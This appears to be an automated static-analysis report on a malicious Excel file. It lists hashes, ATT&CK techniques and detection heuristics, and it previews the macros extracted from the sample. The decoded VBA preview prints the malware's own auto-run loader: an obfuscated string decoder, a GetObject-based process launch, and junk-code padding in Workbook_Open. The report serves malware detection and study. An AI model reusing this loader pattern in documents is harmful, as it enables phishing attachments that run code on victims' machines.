Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1dd4ac4925b58a28…

MALICIOUS

Office (OLE)

225.5 KB Created: 2019-06-13 08:28:30 Authoring application: Microsoft Excel First seen: 2019-10-30
MD5: 8e0b8b5200e879d7a4a62df5ea30253a SHA-1: 50c9dea7c3b2f396f22612f14dae00880ceffa9a SHA-256: 1dd4ac4925b58a2833b5c8969e7c5b5ff5ec590b376d520e6c0a114b941e2075
280 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The file is an Excel document containing both VBA and Excel 4.0 macros, with critical heuristics indicating an obfuscated auto-exec loader. The VBA macro uses GetObject to create and execute an object, likely downloading and running a second-stage payload. The presence of both macro types and the obfuscation suggests a sophisticated downloader, commonly used in spearphishing campaigns.

Heuristics 7

  • ClamAV: Xls.Malware.Valyria-9756472-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-9756472-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 1802 bytes
SHA-256: 89fbf4ed436db0a706f3c5f49740bc1a215ec9721c9730853a5fba9ba9508dc6
Preview script
First 1,000 lines of the extracted script
' 0085     17 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Test Pag
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  HGUR
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  Test Pag,B7,*STACKERROR* not enough arguments for function: RAND,""
'  Test Pag,C7,*STACKERROR* not enough arguments for function: RAND,""
'  Test Pag,B8,[],""
'  Test Pag,C8,[],""
'  Test Pag,B9,[],""
'  Test Pag,C9,[],""
'  Test Pag,B10,[],""
'  Test Pag,C10,[],""
'  Test Pag,B11,[],""
'  Test Pag,C11,[],""
'  Test Pag,B12,[],""
'  Test Pag,C12,[],""
'  Test Pag,B13,[],""
'  Test Pag,C13,[],""
'  Test Pag,B14,[],""
'  Test Pag,C14,[],""
'  Test Pag,B15,[],""
'  Test Pag,C15,[],""
'  Test Pag,B16,[],""
'  Test Pag,C16,[],""
'  Test Pag,B17,[],""
'  Test Pag,C17,[],""
'  Test Pag,B18,[],""
'  Test Pag,C18,[],""
'  Test Pag,B19,[],""
'  Test Pag,C19,[],""
'  Test Pag,B20,[],""
'  Test Pag,C20,[],""
'  Test Pag,B21,[],""
'  Test Pag,C21,[],""
'  Test Pag,B22,[],""
'  Test Pag,C22,[],""
'  Test Pag,B23,[],""
'  Test Pag,C23,[],""
'  Test Pag,B24,[],""
'  Test Pag,C24,[],""
'  Test Pag,B25,[],""
'  Test Pag,C25,[],""
'  Test Pag,B26,[],""
'  Test Pag,C26,[],""
'  Test Pag,B27,[],""
'  Test Pag,C27,[],""
'  Test Pag,B28,[],""
'  Test Pag,C28,[],""
'  Test Pag,B29,[],""
'  Test Pag,C29,[],""
'  Test Pag,B30,[],""
'  Test Pag,C30,[],""
'  Test Pag,B31,[],""
'  Test Pag,C31,[],""
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5380 bytes
SHA-256: 97fe2c640d87e90ccefeed37ff424eb40b033eee1593c570f4d8bd046590cfbe
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private ra791e361394df2 As Variant
Private Function r5e63526981(b5ce25564f As Long) As String
Dim ed6d85e1f9c2 As Long: Dim df94f1edcdea6e As String
For ed6d85e1f9c2 = 1 To Len(ra791e361394df2(b5ce25564f)) Step 2: df94f1edcdea6e = df94f1edcdea6e & Chr(CInt(Chr(Int(0 - 13 - 5 + 9 + 3 + 7 + Int(12 / 7) - 10 + Int(12 / 4) + 8 + 35)) & Chr(Int(0 + 4 + Int(9 / 1) - 8 + Int(9 / 9) + 7 + 59)) & Mid(ra791e361394df2(b5ce25564f), ed6d85e1f9c2, 2)) - 4): Next
r5e63526981 = df94f1edcdea6e
End Function

Private Sub m9ebcfd864b5()
ra791e361394df2 = Split(ThisWorkbook.Sheets("HGURG").Range("J106").Value, ","): Dim ze67833e9a1: Set ze67833e9a1 = GetObject(r5e63526981(1)): ze67833e9a1.Create r5e63526981(0), Null, Null, Null
End Sub
Function Interpolate(X, x0 As Range, y0 As Range)
Dim n, i, j, k As Integer
  'Check that rows are same size'
  If (x0.Cells.Count <> y0.Cells.Count) Then
    MsgBox ("X and Y vector to interpolate command has to be same size!")
  End If
  
  n = x0.Cells.Count
  For i = 1 To n - 1
    j = x0(i).Value
    k = x0(i + 1).Value
    If j > k Then
      MsgBox ("X vector to interpolate command has to be increasing!")
      Return
    End If
  Next i
  If X < x0(1).Value Then
    k = (y0(2).Value - y0(1).Value) / (x0(2).Value - x0(1).Value)
    Interpolate = y0(1).Value + (X - x0(1).Value) * k
  'Check if X0>x0(END)'
  ElseIf X > x0(n).Value Then
    k = (y0(n).Value - y0(n - 1).Value) / (x0(n).Value - x0(n - 1).Value)
    Interpolate = y0(n).Value + (X - x0(n).Value) * k
  Else
   'Loop through values and find where the value are'
   For i = 1 To n
     If X <= x0(i).Value Then
       If (x0(i).Value - x0(i - 1).Value) <> 0 Then
         k = (y0(i).Value - y0(i - 1).Value) / (x0(i).Value - x0(i - 1).Value)
         Interpolate = y0(i).Value + (X - x0(i).Value) * k
       Else
         Interpolate = y0(i).Value + x0(i).Value
       End If
       Exit For
     End If
   Next i
  End If
End Function
Sub Workbook_Open()
Dim rffa72741bff76f As Long: rffa72741bff76f = 18
Dim tbcbdfa72a93736c As String
Dim z4c25f5aa6a189cf As Long
Select Case rffa72741bff76f
Case 5 * Int(75 / 79) - Int(3254 / 961) * 17
If 9 > 6 Then
Dim tomNet0 As Long
tomNet0 = (21 - 14) / 7
Dim xTopp0 As Long
xTopp0 = (tomNet0 / 25) - 9
Else
Dim lastNt0  As Long
lastNt0 = ((17 / 21) - 23)
Dim yRet0 As Long
yRet0 = (lastNt0 - 10) - 16
End If
Case 29 / Int(23 + 16 / 19) / 12
If 11 > 27 Then
Dim tomNet1 As Long
tomNet1 = (13 - 4) + 7
Dim xTopp1 As Long
xTopp1 = (tomNet1 + 8) - 26
Else
Dim lastNt1  As Long
lastNt1 = ((6 - 26) - 25)
Dim yRet1 As Long
yRet1 = (lastNt1 / 11) - 27
End If
Case 22 / Int(9 + 11 / 20) / 16
If 16 > 21 Then
Dim tomNet2 As Long
tomNet2 = (18 - 18) - 22
Dim xTopp2 As Long
xTopp2 = (tomNet2 - 13) - 22
Else
Dim lastNt2  As Long
lastNt2 = ((16 + 15) - 24)
Dim yRet2 As Long
yRet2 = (lastNt2 + 14) - 27
End If
Case 27 / Int(19 + 14 / 4) / 12
If 9 > 24 Then
Dim tomNet3 As Long
tomNet3 = (17 - 12) - 29
Dim xTopp3 As Long
xTopp3 = (tomNet3 - 26) - 24
Else
Dim lastNt3  As Long
lastNt3 = ((22 - 15) - 19)
Dim yRet3 As Long
yRet3 = (lastNt3 - 13) - 29
End If
Case 6 + (192 - 288) + 22
If 5 > 22 Then
Dim tomNet4 As Long
tomNet4 = (14 - 14) * 20
Dim xTopp4 As Long
xTopp4 = (tomNet4 + 20) - 9
Else
Dim lastNt4  As Long
lastNt4 = ((16 - 28) - 28)
Dim yRet4 As Long
yRet4 = (lastNt4 + 9) - 17
End If
Case 18 - (27 + 15) - 28
If 26 > 24 Then
Dim tomNet5 As Long
tomNet5 = (6 - 11) * 11
Dim xTopp5 As Long
xTopp5 = (tomNet5 * 15) - 6
Else
Dim lastNt5  As Long
lastNt5 = ((26 - 24) - 19)
Dim yRet5 As Long
yRet5 = (lastNt5 / 8) - 8
End If
Case ((((18 * 8) / 4) * 4) / 8):
Dim tomNet6 As Long
tomNet6 = (25 / 10) + 5 / 15
Dim
... (truncated)